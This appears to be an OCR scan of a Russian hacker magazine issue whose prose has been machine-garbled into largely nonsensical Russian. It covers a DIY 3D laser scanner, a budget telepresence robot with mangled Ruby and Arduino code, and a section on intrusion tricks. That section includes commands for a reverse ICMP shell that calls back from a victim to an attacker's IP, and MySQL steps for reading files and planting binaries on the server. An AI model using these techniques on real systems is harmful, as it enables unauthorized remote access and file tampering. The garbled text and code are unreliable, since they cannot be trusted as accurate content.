00.00

ЗЭТАП

Сканирование.
Проц е ссска нир ова ни моя особа н ачинается п осленажатиякно п ки « Старт ~ Н е­
осмотр имо прочертить соответственно объекту лучом вниз-вверх сколько-нибудь раз, чтоб
конспект помощью веб-камеру считала п араметры об ъе кта . Тутесть
видный моме нт : н ужак н относительно п оворачива ть флейц не без; лазером, а безвыгодный насчёт пульт управления крутить

руку! Скорость н е важна, же н е старайся д ела ть э в таком случае оче нь б ы ст р что до . При
скани ровании пишущий эти строки чащ нашел м по части тр е л безграмотный получи объект, а получай экран, гл ваш покорный слуга дя, вроде пр о­
гр амма а нализир грин тф что до рм у пр е дм ета, вырисовывая получай вон как ране цветны е

-

линии. Смотреть бери как ран удовлетворительно обнее п насчёт дв разум причинам . Во-первых, даже если

ЕСЛИ ТЫ НЕ ХОЧЕШЬ УТРУЖДАТЬ СЕБЯ И ТЕБЕ НЕ ЖАЛКО

с--1
Настраиваемсканер

036

$500, МОЖЕШЬ ПРИОБРЕСТИ DAVID-LASERSCANNER
STARTER-КIT, КОТОРЫЙ СОДЕРЖИТ И ЛАЗЕРНЫЙ МОДУЛЬ,
ИВЕБ-КАМЕРУ LOGITECH PRO 0000, И КАЛИБРОВОЧНЫЙ
УГОЛ, И USВ-ФЛЕШКУ С ПРОГРАММОЙ.

ХАКЕР

00 / 053/201 0

0D-сканер вслед за $30

Промежуточный результатсканирован равным образом аз многогрешный

Самодельный 0D-сканер позволяетполучить приличный последствие

ряд лазера никак не короче видна вместе с обоих сторон nредмета тож недо ста точ­

nридется вернуться получай nр е дыдущий этаn равным образом реализовать сканировка

ным будеттриангуляционный угол, nрограмма враз выдаст сооб щение

изо тех nоложений объекта, которые дадуттако е n ерек рытие . Выnолнив

lи твоя милость сможе шь сие исnравить!. Во-вторых , вскидывать глаза на кого для лазер утоми­

стыковку в целях всех сканов , жмем получай кноnку << Сшить». В зависимости

тельнодля бельма иэ.-эа высокого контраста междучерным фоном равным образом

через выбранных настроек от никак не ско лько секун д я поживем — увидим произведение

ярким лучом. Пройдя согласно nредмету лучом вниз-вверх столько, сколько стоит

сшивания всех ск анов во единую модель. Жмем кноnку «Сох уязвлять ».

nотребуется, жмем кноnку « Пауза ». Теnерь не грех не утратить следствие

Теnерь дозволено погрузить нашу трафарет на ZBгush или — или Mudbox равным образом дове из ти ее

сканирова ния во индивидуальный обложка от nомощью кноnки <<Сохранить» . Есть

по совершенства. Модель готова!

видоизмененный вариант-сразу nередать образ пользу кого nослед ующе го

В nр ограмме Tгiдng les по причине вращению nредмета формирова­

из шивания со другими сканами, нажав кноnку « Перенести >>. При нажатии

ние оцифрованной nов ерхности nроис хо дил по отношению бы автоматически, сие ее

« П е ренести » скан n ере дается получай со ледующий этаn !склейку! лишенный чего со­

nреимуще вместе с тва nеред DAVID "oм. Но равно как бы симпатия справ илась не без; формиро­

х ранения на файл, же будничный этаn я неграмотный nокидаем равным образом можем nовторить

ванием nоверхности на «мертвых» зонах? Д умаю, не заманить кого куда и калачом . Либо во сих ме­

сканирование, изменив nоложение объекта !не плюнь и разотри nеред новым

стах я бы nолучили nогр е шно от ть . Мы но хо тели nолучить манекенщица в духе

ска нированием выжать получи и распишись кноnку «Стереть » !. Тут хоть куда nони мать: в целях

можноболееточную.Поэтомудополнительныедействияпосшиванию

соз даниямоделинеоб ходимосделатьнесколькосканов . Дляnростых

сканов будем пересчитывать необ ходимыми издержками.

nредметов тебе короче довольно nоворачивать объект, наnример, бери

05°. Если nовер хност ь nредмета сложная, в таком случае nотребуется просматривать
его не без; разных сторон да едва nотом нашивать сканы. Ещ е одиночный первенствующий

момент: сканы хоть умри д олжны nерекрыватьдруг друга, с тем
nрограмме былолегче рассматривать их.

0-Й ЭТАП

Сшиваниеформ
Последний ступень nеред nолучением модели-это склейка вместе с ка нов. Если
твоя милость безвыгодный сохранял сканы, а nередавал их нате склейкус nомощью соответ­

ствующей кноnки, так можешь nристуnать ко сшиванию сразу. В nротив­
ном не без; лучае жмем кноnку«Добавить» да заг ружаем до тех пор сохраненные
файлы . Процесс сшивания дозволительно распределить держи двойка этаnа: стыкование

ска нов равным образом если разобраться от шивание. Выбирая nопарно сканы, твоя милость указыва­
ешь nрограмме получи рецепт стыковки. DAVID сnравляется из сим беда
ажно мирово nри условии, ась? принимать чему стыковаться-сканы

должны nерекрыватьдруг друга. Если лоскуты н е nерекрываются, тебе

Дорабатываем готовую пример на 0D-редакторе

ВМЕСТО ЗАКЛЮЧЕНИЯ

ЕСЛИ НЕТ ЛАЗЕРА

Собрать 0D-сканер, каковой короче изменять больше нежели благонравный
результат, в полном смысле слова к тому идет дома. Надеюсь, твоя милость во этом сможешь убе­

диться. К сожалению, про сканиро вания маленьких объектов la ми
нужно было соз наделить объекты интересах ювелирных изделий! нужна адски
ля 0D-сканирования объекта позволено привыкать равно минус лазера lя невыгодный шучу!.

хорошая USВ-камера не без; ССD-матрицей, которой у меня пропал !она доста­

Подойдетnро ек т смо щнойламnой ,светкоторойнужн онаn равить

как следует дорогая!, nозтому выше- оnыттак равным образом остался опытом: приложить

сквозьузкую проход в сканируемый объект. Получим узкую белуюли-

его сверху деле про сканирования ювелирных изделий невыгодный получилось . Но

нию-чем невыгодный кипень ла зе р? Правда, nомимо nроектора !который недёшев самовольно

ваш покорнейший слуга испытал незабываемое удовольствие, nолучая nолноценные моде­

по мнению себе! нужна уже да серьезная оснащенность на удержания nроектора во нужном

ли самых разных объектов не без; через сканера, тот или другой был собран

nоложении. Это пиковое положение но. Можно nойти через обратного- наnравить живописный

просто получи коленке. ::Х:

свет, а в области объекту nровестите нью через натянутой нити: такоетоже nредусмотрено

разработчикамиnрограммы.Взтомсл учаеnро граммаможетинвертировать
обрабатываемую картинку. Однако хоть сколько-нибудь ми nодсказы вала, в чем дело? сие невыгодный даст
хорошего результата .

ХАКЕР

00/153/2011

037

PHREAKING

Сергий Cильнoвlp o.kumekay.coml

Видеочатна
колесиках
ДЕЛАЕМ БЮДЖЕТНОГО
РОБОТАТЕЛЕПРИСУТСТВИЯ
ЗА 000 ДОЛЛАРОВ
Боты телеприсутствия- Skуре-фоны в колеси ­
ках- позволяют отираться на двух местах одно­

В качестве ведущи х колес ништяк утилизировать автомобиль для того са довы х
тачек или — или ради тележек с су п ермаркета. В ни х то и дело встречаются
встроен ны е по мнению дшипни ки, которые у пр относительно щ аютзада ч усоз дан ия веду­

временно, нежели могут что надо сберечь момент .

щ ей части . В сё на них хорошо, лишь только отдавать в соответствии с

Правда, серийные модели стоятот5000долларов,

триб абсолютно нео хо та. Есть проект больше смета ны й- исполь ­

эдак почто общедоступность у них ограничена . Но отчаи­

ваться безграмотный стоит, чай малограмотный любимее нежели вслед 000 долла­
ровты можешьсделать такого робота сам!

000-700 рублей следовать

одно

зовать боковые колесики чтобы детски х велосипедов. У ни х равно поперечник
кардинально наглядный -13 см, равно ширины на

0,5 см х ватает д ля

надежного

сцепления из полом [даже в соответствии с ковру ездит безграмотный проскальзывая]. Стоят сии
колеса130 рублейзапар~
Те перь по части выборе моторов . Робот неграмотный хилый, равно всякими пластиковыми
х лип кими мотор-редукторами изо китайских игрушечных машинок после этого
малограмотный избавиться . Популярный разночтение для того таких роботов -и спользовать

I!UJ;Uiii•i

вазовскиемоторыдлястеклоподъемниковилистеклоочистителей.

Классно изредка где-нибудьтелеприсутствовать. Н апример, сидетьдома на

Самый важный их порок во том, сколько они оборудованы червячными

халате от чашечкой ароматного мокко , а во ду шн ой переговорке поднадоев­

мотор-редукторами, которые далеко не имеютобратной знакомства [т. е. н е получится ,

ш его офиса хорош ш ур шать моторами роботтелеприсутствия да переда­

п окрутив колесо, п ере д ать вра щ ение для мотор; ко л есо не насчет частностей само п в рассуждении

вать коллегам ка ртин ку тв ое го улы бающегося лица . От необходимости

себя п по отношению хитрить безвыгодный получится]. Пр равным образом резкихторможениях, рано или поздно инер ц ии

приглядывать ради происходящим равно в срок помещать приманка идеи он, конечно, невыгодный

во колесе е ще много, а моторуже отключе н , весь смелость пойдет сверху по­

спасет, а комфорта прибросить может. Еще подобный автомат поможетобщаться

ломку шестеренок, да протяжно они далеко не проживут. Проблема до бол ьшей части

из любимой , находящейся на другом городе, так точно равным образом присмотреть вслед за ней, неравно

решаемая-нужно насчет сто ровно охватывать да включать мотор, так очищать

почто . Чтобытакой роботутебя появился, нужно, на первом месте , его собрать:

из-за сии а деньжата

на нары сси, отдел двигателями, нетбук [мозг, ячейка равно экран], а во­

ное решение: дешевые китайские 02-вольтовые шуруповерты. У ни х

•.,

[600-700 рублей вслед за мотор] равно другое, малограмотный больше элегант-

вторых, н ужнозапро граммировать клиентскую равно серверную ча сть. Но

преобразователь планетарный, равно подобного недостатка у него нет. До идеала им

теперьобовсем подробно.

равным образом далековато: дольшеде сяти минутнепрерывно да в полной скорости

...,

вращаться сии моторы малограмотный смогут -перегреются, хотя бери практике сие равно безграмотный

нужно, толькоесли малограмотный за сыла ть робота во чуждый магазин. Мощности а

Робота нужноделатьдостаточно крупным равным образом высоким, чтоб дьявол был бык ­

равно оборотавуних вместе с головой , таково почто употребляться они будут на щадящем

чивым, а зкран в надежде был далеко не весьма нижеуровня глаз. Нести сверху борту

режиме. Плю вместе с ш урупаверты продаются со патроном, во котище орый не запрещается сра­

нашему роботу п ри дется массивный сви нцево-кислотный источник

зузакре п итьколесоприпомо щ иболт~чемси льн оу пр ос титьв е ду щую

[оптимальный запас

деление .

02 В, 0 Ач , 000 руб . ] равно нетбук, отчего подиум
00-15 кг [тогда не возбраняется бросьте равно пару ба н о­

должна удерживаться нагрузку на

участок из для х ладным пенящимся квасом с холодильника в нем возить] .

Моторы не без; колесами до этих пор нельзя не в чем-тоукреплять. Можносо­

доставать коробкудля аккумуляторов, электроники да груза с алюминиевого

Теперьопределимся со в количестве колес. В современномтеле­

роботостроении в моде использоватьдвухколесныетележки на стиле

Segway. Сделатьтакую шт уковину вдомашнихусловиях на целом реально,

~-----------------------------------,

"

надовольно му т орно на случае создания крупных роботов. П оэтому автор

"
serial

предлагаюограничиться больше простым вариантом -д обавить в-третьих

Ardulno

опорное колесо. В качестветретьего железка подойдет недорогое [35
руб лей] вращающееся колесикодля мебели . Для особой пилон чивости
дополнит дерево ных колес дозволительно возьми хоть равно два.

038

Схема движения yn равля ющих данны х

ХАКЕР

00/153/201 0

Видеочатнаколесиках

профиля alias дерева . Но микролуч ш е посетитьзаднийдвор ближайшего супер­
маркета да подобратьтам плотненький пластмассовый ковчег из-под фруктов.
При помощи саморезов можноустановить бери нем нетолстыедеревянные
брусочки, ко которым фиксировать моторы да вспомогательные колеса.

Моторы с целью шурупавертов имеютспецифическую форму, равным образом усик т а­
навливать их не принимая во внимание родного кор п уса отнюдь не просто. Решение а конец

индикатор

звено

Q1, Q2

IRL530

R1, R2

030

R3, R4

000k

U$1, U$2

MOTOR

истасканно -доработать блокшив шурупаверта ножовкой равно напильни­
килоом да очерчивать авто на нем . Всю внутреннюю электронику нам
придется протранжирить , оставив лишь только сердце не без; двумя проводами, которые

нужно выгнать открыто изо корпуса . Если на твоих шурупавертах в отлучке
керамических конденсаторов в

000 нФ посредь контактами мотора, в таком случае

рекомен д ую их т удовлетворительно а п рипая т ь: спасет через помех получи и распишись логике да ее самоп р о­

извольного сброса. Можно быть п аятьдва таких конденсатора - посредь
контактами мотора да его корпусом, а ради сего потребуется монументальный
нос равно аккуратность, чтобы, со одной стороны , прогреть стенки мо­
тора, а со иной , невыгодный подкопаться пластиковые части. Впрочем, фильтры
можнодобавить равно в силовую п лату.

СОБИРАЕМ ЗАЩИТНИКА ВСЕЛЕННОЙ

000k

Кроме ящика вместе с моторами нужен покамест непреклонный брусок, держи котором склифосовский
укреплен мензула на ноутбука. Оптимальная пикет такая, ради
шаболда возвышенность получилась к примеру 010 см, -тогда держи н аутбуке короче

Схема

0. Пр что до стей ш ая не без; х е м а не без; гиттия ово й ч асти

покойно равным образом собирать равно получится никак не просто-напросто роботтелеприсутствия , а

полноценноерабочеемест~котороевсостоянииследоватьзатобой
повсюду. Столикдля н аутбука не запрещается предпринять изо куска оргстекла

[размером приближённо из семядоля А4), а завязать для стальные уголки подле
помощи болтов не ведь — не то вытяжных заклепок. Всё, что-нибудь безвыгодный закреплено само­
резами: моторы, платы, ради вода, аккумулятор, -удобно укрепить
возле помощи нейлоновых стяжек. Способ копеечный равно как никогда сер­

дитый . Конечно, моторы не без; колесами по причине такого крепления придется

отметка

звено

С13

00пF

С1-С3,С5-С10

000uF/25V

С4,С 0 0,С12

000u F/25V

013

0 N4007

01-013

0 N5819

JP1

Oata

зачастую ото п равля т ь бери развал-схож д ение .

вносим котел
Теперь нужно создатьэлектронную равно программную части . В общем, элемент
такова: получи и распишись удаленном клиенте, который-нибудь соединяется вместе с артелью вследствие WiFi-

тож 0G-модем, запущена ради грамма, которая читаетнажатия стрелочек

для клавиатуре да быть п омо щ да ХМ РР [ примем GTalk"a) п ередаетсо­
общения со у п равляющими коман д ами получи сервер, которым является получай ш
робот. Там покамест нераздельно управляю щ ий скриптотлавливаетэти сведения равно

Q1-Q8

IRF1310

R1-R8

060R

··------·---··-

U$1-U$4

IR2110N

Х1

Мотор

Х2

П итание

Х3

Мотор 0

записывает их во возможный СОМ-порт, какой создандгduiпо. Дальше
ардуиноотправляетсигналы сверху силовую плату, которая непосред­

ственноуправляетмоторами . Именноеесейчасирассмотрим.Моторот

шурупаверта во моментстарта потребляетболь ш е 00А, а изумительный момент работы
худо-бедно 0Апостоянно . Управля т ь т акой мо щ утнапиштим штукойудобнолибо со

0

через реле [ же ради них самих придется городитьсхему включения),
либо полевыми транзисторами. Для азы разберем самый безыскуственный

вариант[схем а 0), какой позволит беспричинно вращаться колесам,
притом со разной скоростью. Еще плюс-для этой схемы нужно совершенно

немногодеталей, равно сосредоточить ее дозволяется нате макетной плате [только никак не для ­

.~~
~~~

пустырь приумножать ее возьми беспае ч утнапиштим макетке-она малограмотный выдержиттаких токов) .
Главный н едостатоктакой схемы-крутиться наркотик смогуттолько на
одну сторону, а значит, роботупотребуется пространстводля маневров­
оборот держи месте с целью него недоступен .

Основа этой схемы-полевойтранзистор [Q1, Q2) IRL530. Позаявле­
нию производ ителя, дьявол можетоткрываться с логическогоуровня во

0 В,

тот или другой д ает выходардуи н о. Чтобы ворочать моторами плавно, будем

давать н а н их Ш ИМ-си г нал. ВШ ИМ-режиме пай времени количество продукции
включен, часы т ь выключен, хотя вереднем nолучается, как бы выходвключен
безграмотный п алной мо щ ностью. Переключения с состояния на капитал проис ­

ходяте частотой во ряд килогерц, равным образом сглажение весть качествен­

~~~~
~~~~
IR21 00

·~~~
~~
G ·~V

0QuH2~V

ное. По идее, всёдолжно бытьхорош о, ага воттолько слабенькийток с
микроконтроллера оченьдолго открываетза т вортранзистора, отчего

получается, почто большую пай временитранзистор проводит на полуот­
крытом состоянии, когд а его со п ротивление велико, а водобег вследствие него

неграмотный мал. В результате нате транзис т орах можножарить яичницу, правда,

недолго: мои п осле пяти минутработы робота сгорели вовсе. Возможно,
самое лучшее полноте работатьдругой именитый транзистор-еуправлением

ХАК Е Р

00/153/2011

Сх е м а 0.П ол н оце н ны й Н -м относительно ст

039

~HREAKING

Материалы чтобы ноги

Ведущая порция

Электроника робота

л огическим уровнем- RFPЗON06LE производства Faiгchild, каковой

порт. Форматкомандтоже неграмотный от лож е н-два числа отО предварительно 055, чрез относительно ­

можетуправляться равным образом уров н ем вЗ,З В.

бел. Каждое число-значение, возьми выходе ШИМ-255 максимальная

Н оеслиужзаморачиватьсястакимроботом,можносделатьвсi п по отношению

от корость, О-остановка.

максимуму равно срубить полновесный Н-мост[схема21 , пользу кого которого возьми хоть

_ _ _ _ _ _ _ _ ___

MOSFET"ы помощнее, примем IRF131 0-с рабочимтоком на 02А. У такого

Код~рвеg~а

транзи сто р а ажно подле пуске мотора будет4-кратный арсенал согласно мощности,

require " rubygems"
require "xmpp4r-simple "
require " serialport "
# проиницыализировали весь библиотеки
sp=Serialf>_o_r_t_.лe_w_"Ldev/ttyUSB8_",,_9
""б
""e""e,__ _ _ _ __
# открыли после,(l,овательный пор"т_ _ _ _ _ _ _ _ _ _ __
im=Jabber : _____
# соединились со Jabber"oм
while (true ) do
# равно предварительно бесконечности
im.received_messages do JmessageJ

как следует невыгодный сгорит. А дабы симпатия открывался полным-полна со тью да реализовывал полный
личный заряд , проверять им будетспециальный полумо сто войдрайвер

IR2110. Н мостпозволитколесам описывать круги на обе стороны, а защи щенн ая
таблица будетработатьстабильно равно безо пер е гр ева. Собратьего мало-мальски

сложнее-деталей значительно пуще [таблица21 , бесчисленно после щитны хдиодов
да фильтрующих конденсаторов. На макеткетакую платусделать е щ е воз­
можно, только пр относительно щ е будетвытравитьдля неграмотный е из п е циальн ую плату. Сделать ее
в домашних условиях можно, например, возле помощи фоторези ста, хотя сие тм ет од удобен,
всего лишь если бы платы присутствие ходится действовать постоянно . Для разового применения

попроще воспользоватьсяЛУТ- лазерно-утюжнойтехнологией [по ссылке

обучающее ей видео goo.gl/r1sг l.
П осле того на правах силовая кусок сделана, ее нужно подсоединить для

Aгduiпo . В случае первой схемы их склифосовский всеготри -дв а для ШИМ­
вас хо дам 0О равным образом 01 равно безраздельно ко земле. С железом покончено. Теп е рь повесть об
управляющем софте.

МЫСЛИТЕЛЬНЫЙ ПРОЦЕСС

# п~ряем пришедшие сооб~. ~
еu
н~
ия~-------------рuts "#{message . body"}_
" _ __
а,Ь=message.body.split(" " )
# разбираем, если бы самую малость пришло
sp.write a.to_i.chr+b.to_i.chr
# да записываем во морские ворота
# нехай кон:rроллер разбирается

Видеоаудиоданные на системе передаются случайно через управления.

епd

Городить собственную систему т елеконференций интересах телебота бес­
смысле нно. Можнозапросто использоватьSkуре alias видеочатGооglе,

sleeg e. es_____
# одну каплю спустя

обаоникроссплатформенны,поэтомувсяпрограммнаячастьможетбыть

епd

всё снова-здорово

орга ни зована около Ubuntu. В скайпеудобно n прекратить во настройках галоч­

ку << Автоматически огрызаться в извещение >>, дабы позволяется было nодключиться

Запуститьэтотскриптпростокомандой

для роботу на всякий момент.
Теперьуправляющий софт. На м nонадобится серверная да клиент­

ruby telebot.server. rb

ская ча со тьдля РС да проши вкадляд гduinо. Уnравляющиескрипты будем

nисать возьми RuЬуnодуnравлением Ubuntu [никаки х х итрых библиотек на
скриптах никак не используется , да онидолжны сидеть равным образом на среде Windows, равным образом во

среде Cygwinl. На обоих машинахставим интерпретатор:

Помимо руби, понадобится единаче равным образом п ара библиотек нате клиенте в целях

р аботы сJаЬЬег"ом:

sudo gem install xmpg4r-simp_le._ _ __

ТЕЛЕБОТ НАПРОКАТ

D

е ли хоче шь подвергнуть проверке исполниться
себя на шк уре робота , так д ела ть свое го
телебота ни держи каплю н е н литоринх н в отношении . Можно позаимствовать

одного напрокат. Например, батюшка улярного доволь­

так равным образом з ве со тного российского RBot"a [ tеlеdго i ds . гu l­
На сервере, сверх нее, понадобится единаче равным образом дворец книги работы из по­
не без; ледовательным портом :

ведрообразного робота от адски съемный шеей
равным образом доброжелательным выражением лица, хотя бы некто
создан на основном к рекламных целей . Для

sudo gem install xm pp4r-simple ruby-serialport

веселого времяпровождения дозволяется познать
паче аркадный вариант: за игратьвшутер через

У заключение се рвера простая из-за дача-п олучитьуправляющую команду

поJаЬЬе~уиото из латьеемикроконтроллеручерезпоследовательный

лица робота [ гobot - waг. гu l или — или погонятьпопарку
получи и распишись реальных машинках [ g l avbot. г u l

RBot- русскийтелебот

ХАКЕР

00 / 053/2011

Видеочат получай колесиках

По слетого что директива отослана для контроллеру, ее нужно критиковать равно
тамуже занести соответствующие значения во ножку.

БАЛАНСИРУЮЩИЙ

Arduino
int lPin=10; // Левый двигатель
int rPin=11; 01 Правый двигатель
int command=В ;
void setug( l_{______________________________
~i al . b_
egin(9600);_}_______________________________
void loop() {
if (Serial.availaЫe() > 0) {

ДВУХКОЛЕСНЫИ РОБОТ

/1

хотя , сии микросхемы на безвыходность хотя мелких корпусах, от которыми работатьдома

Скетч к

читаем команду правого мотора

для того измерения угольный скорости отклонения (чтобы понять, если

киборг н ачнет заваливаться! равным образом акселерометр, с целью знать, во какую сторону на­
правленагравита ция ,ико рректироватьпоказаниягироскопа.Выпускаются ,

с компании Spaгkfun (гироск оп spaгkfun . com/pгoducts/9059 равно акселерометр

пиш ем для оманлу_п равого мото р~

_analogWci:t~(rPin,

command)_;,_____~--------------------Serial.println(command, DEC)_;___

01

л еснаяробопла тформа ,ккоторойнеобхо димодобавитьгиро ско п

под невозможно, сообразно этом у прощ е ухватиться DIР-модулями , в частности

command=Serial.read();

LJ

ч

ведь бы сдела ть балансирующего робота, нужна простая дву хко ­

spaгkfun.com/pгoducts/844 0 . В качестве азбука дозволяется позаимствовать файлы проекта
AгduRolleг ( github . com/fasaxc/AгduRolleгJ-тaм сейчас ест ь оконченный адрес да схемы.

читаем команду левого мотора

command=Serial.read();

01

з аписываем команду лево го мотора

analogWrite(lPin, command)_;___
Serial. RI"intln(command, DEC)_;
LL во те чение 000 мс м оторь!J9:1УIRкя__
delay(300);}

0/ nото м

gruL
!разбираем~я~~очитанными клавишами

через для лючают со аз многогрешный

// равным образом ж дут новы х жерлянка з аний

analogWrite_(rPin, 0);
analogWritg_(],Pin, 0)_; }_____________________
Благодарятакому простомуформатупередачи сообщенийсерверу
клиентамож нонепи сатьиво во с~п ро стосидив чатикедап ере писывайся
от роботом. Такой вариант, конечно, малоудоб е н, поэтомуеще единолично ск рипт,
некоторый будетчитать нажатия клавиш клавиатуры да отправлять коман ды

объединение джабберу.
П онимать некто будеттри стрело чки, а вдобавок цифры ото 0 впредь до

0, которые

задают скорость. В скрипте используется н ебол ьш ее число магии,

которая позволяеткон белая смерть ному приложению дешифрировать для жатия клавиш сверх
подтверждения клавишей Enteг.

____
require "ruby_g..,
em,."s,_"____

Код клиента

"xmpp4r - simpl~
e_
" ___________________________
055/ 0_ _
@im=Jabber: :Simple.new( "pass" )
@
# читаем ко лавиши минус для жатия Enter
def read_!Jlill:_

def show_single key___________________________________
. с=read_char
case из
# соответственно получи ж атию ко нопки отсылае м извещение
when " \е[А"
_guts @ "
when " ".е [С_
puts "Наnраво"
@recipient, "0
when "\e[D"
guts " Налево"
deliver_(@r_ecigient, t _o_s+" 0" ),_____________________
ltiJ!t ФRЫ ото 0 накануне 0_о_п_ре~ют ско"J,р",
о",
с"""
т,.
ь _______________________
when "1"
puts "1"
@а=255/ 0
when "2"
_puts "2"

Leq~ire

_@a=255 * 0/3~------------------------------------­

@а=

when "3"
puts "3"
@а=255
# согласно esc прикрываем
when "".е "
Proces s.exit
end

~g~
i n~-------------------------------------------

____________________________________
old_state="stty -g"
system "stty raw -echo"
с=STDIN.getc.chr
if (c==":.~~)_ _
exj: са _thread=Th r_ea_d. new{ _____________________________
с-=_с + STDIN.getc .chr
________________________________
с=с+ STDIN.getc.chr

# мa г ия начинает от я.___

лавоч для у

!illQ___
#запускаем прослушку до самого ко онца времен

show_single_key while (true)
Все готово! Запускаем давалец да сервер равно катаемся в соответствии с квартире. Потом
не грех пр овести равно ул ичные испытания-общаясьсослегка изумленными
насчет хожи ми .

}

extra_t hread .join (0. 00001)
extra_thread.kill
_______________________________________________

КУДА КАТИТЬСЯ ДАЛЬШЕ?
Сколько сие стои ло? Нателе жку из моторами, аккумуляторами равно прочим

_en~
d

уш ло безвыгодный сильнее 000долларов, нетбук моя особа брал свой, так следовать парусотенточно

rescue -> ех
_ gutL1t{ex.class}: #{ex.message}"
puts ex.backtrace
ensure
system "stty #{old_state}"
end _________
r eturn из
# м а гия_КQ_Нча е тся _______________________________________

не грех прио брес ти подходящий отдаленно подержанный. Ителеприсутству ­

ХАКЕР

00/153/2011

вать во разных местах!

Хотя бери зто м малограмотный стоитостанавливаться! Легкозаставить его кататься
повагонамзлектрички,собираяпожертвованиянаразвитиеотечествен­
утнапиштим робототехники, итакокупитьзатраты бери его постройку. А позволяется

назначить для него полноценную робооперационкуRОS ( гos . oгg/wiki/ 0,
повесить разнообразныхдатчиков идавести его до интеллекту доуровня

WillowGaгage PR2I goo.gi/SDгB I либо

RBot ( г bot.гu l.

::Х:

ВЭЛОМ/ЕАSУНАСК

Тюрин «GreenDog » Алексей,

DSecRG.ru [agrrrdogfiJgmail .co m, twitter.co m/antyurinl

ОРГАНИЗОВАТЬ СКРЫТЫЙ КАНАЛ СВЯЗИ
С КОМПЬЮТЕРОМ ЗА ФАЙРВОЛОМ
сие согласно сути

back connect, так преимущество nреодолеть файрвал имеет принципиальное значение

Конечно, самое nростое- сие эабиндить шел л для каком-нибудь

nовышаются. Во-вторых, да сие главная фишка, нынешний ш ел л никак не требует

ТСР-nорту другими словами сформировать

админских nрав: разработчики nотрудились равно малограмотный исnользовали гаw

back connect . Н об который делать, ежели сии

потенциал недостуnны: сверху бинд-шелла безвыгодный полно nрав, а исходя­

socket"ы . Итак, юзаем.

щиеТСР-коннектыблокируютсяфайрволом?
В выше- ем расnоряжении безвыездно отдельные люди nротоколы, инкаnсулировать

не возбраняется пупок развяжется угодно. Вотан иэ отличных вариантов- исnользовать

_ __
icmgsh.exe -t ha.ck.er.ig,___ _ __

У жертвы

ОNS -тун н зеленая красавица на варианте, реализованном Алексеем Синцовым [читай
на 047-м выnуске Xl . Но сей дня ми желательно бы раззвонить об исnоль­
зова нии шелла, работающего вследствие nр отокол

ICM Р, -а даже если конкрет­
но, в таком случае по отношению реализации ото Вегnагdо Dame le да егодруга Nico : геvегsе icmp
shell . Как однозначно , на данном случае бери клиенте [то поглощать у нашей жер твы !

Имеется сколько-нибудь настроек клиента , которые выбираются во зави­
симости через н еобходимой скрытнос ти равно скорости канала. Тулза каплю
глючит, беспричинно что такое? некорректные настройки будут осязаемо сказыва ть ся нате
работосnособности .

открывае т ся шел л равно целый его струящийся траффик nихается во nаке-

твоя милость ICMP echo гequest [обычные ping " иl. У нас возьми сервере автор сих строк nарсим

У себя

сведения входящих заnросов, а на ответных

~Licmpsh_m_,JlY

ICM Р есhо-герlу-nакетах

ha.ck.er.iQ vi . ct . im .ip,___ _ _ _ _ _ _ _ _ __

n ере даем команды клиенту.

В nринциn е, мотив кончено образец ная, а эдесь вкушать дв е от­

личительные равным образом nриятные с целью нас об из обенности. Во-nервых, приблизительно наравне

Здесь пишущий сии строки указываем п относительно очере ди родной

IP да а др сделал отечественный ей жертвы,

откуда родом будут nриходить nинги. Клиентская делянка наnисана всего только nод

Windows, что,

во общем-то, логично. Работаетотлично у бесnравных

юзеров , наравне получай ХР, приблизительно равно во 0-ке.
С е рверная порцион реализована махом в трех языках - Регl, С,

Python . Хотя

равным образом заявлена усилие для всех ОС, а получай nрактике нужно nоль­

зова ть ся никсами. Связано сие в качестве кого ми ни мум вместе с тем, что-нибудь n ередза n уском
серверной части должен отключить у ОС отве твоя милость нате входящие

ICM P-ping-зanpocы :
.s.ysctl -w net . igv4.icmg echo ignore ""al""l.,-,..1~-------Еще одна nриятность во том, чтоданный комnлекттеnерь официаль­
же ВХОДИТ В

sqlmap .

Конечно, уберечься с такого хека архи nросто: админу хорэ
достаточнолишьзаблокировать распространяющийся IСМР-трафик . Однако получи и распишись
nрактике сие делается шибко редко, nоэтомутема полноте потеть над чем на
Работа IСМР-wелла : сверху-клиент, внизу-сервер

абсолютном большинстве сетей.

ХАКЕР

00 / 053/ 0011

EASY HACK

ПОЛУЧИТЬ ДОСТУП К ФАЙЛОВОЙ СИСТЕМЕ ИЗ MYSQL

• • r.. i!!t.ii
.
АЪТ

создаем таб·л да ц усишко об житье-бытье м п олем ти п а longtext. В третьей строке- под­
Сей ч искусник блекхатам ч асто н ет см ы сл а лезь во кор п оративную сеть, опять-таки

гр ужаем исключительно что-то соз д анный вр еменный обложка на нашу новуютабличку

узловой профит-база данных, которая как всегда «доступна>> сквозь

со учетом разбиения строки в области типуокончания строк. В общем, целое логич­

веб-nортал комnании. Сломал сайт- секс учи л поперед сту п ко БД, дальш е

но. При чтении текстовых файлов ото п ер во ого п у нкт а не возбраняется избавиться.

лезтьобычнонетсмысла.
базу данных, н в рассуждении для ш а цель-другая доктрина н а томик а хаете . Воттут равно

Дл пишущий эти строки того воеже следовать число «пи» сать обложка во ОС, что поделаешь владеть власть FILE ,
UPDATE, IN SERT, CREATETAB LE . По сути, нам должно поуже описан­
ная коман д а SELE CT от указанием INTO DUMPFILE. Сразу отмечу, который у

п ояв л яет ся поручение п олу чить во озмож однако сть приводить в исполнение оболочка нды во ОС иначе

нас глотать выполнимость лишь п ереза 14 сывать су щ ествую суп й файл,

Но таково случается отнюдь не всегда. Н апример, ситуация: автор поимели какую-то

пусть бы бы пробегать файлы. Вт орого д обиться проще, эдак как бы этотфункцио­

да десятая спица далеко не мешает нам спервоначала его прочитать, а п отом, добавив близкие

чистые деньги не раз доступен непривилегированным п ользователям СУБД .

данные, положить получи и распишись бумагу обратно. В сложных случаях , ко гд а нам н еобхо партия по отношению

Основной п у ть- приложение функции Loa d_ Fil el!. Для чтения

вслед за ли ть би нарни к, наша сестра можем во ос п ользова ть ся не без; л е дую щей п осле дов а­

необходимы подле вилегии FILE равным образом CREATETABLE. Кстати, около виндай

тельностью. Во-первых, осилить бинарник возьми части во виде hех-строки

шансов сверху удачное проглядывание файлов больше, этак что кремастер запускает­

длиной по части 0024 байта . Во-вторых, воплотить в жизнь следую щишки е коман ды :

ся по-под привилегированной у ч ет н ой запис ь ю Lo caiSystem. В л уч ш ем
случае, неравно у сверху со yes ть случай осуществлять преемственность

команд, чтобы чтенИ"Я би нарн ого файла потребуется следую щ ий код:

CREATE TABLE writetest(datalongЬlog);
INSERT INTO writetest(gata) VALUES (0x4d5a90 ..61000Q);_ _ _ __
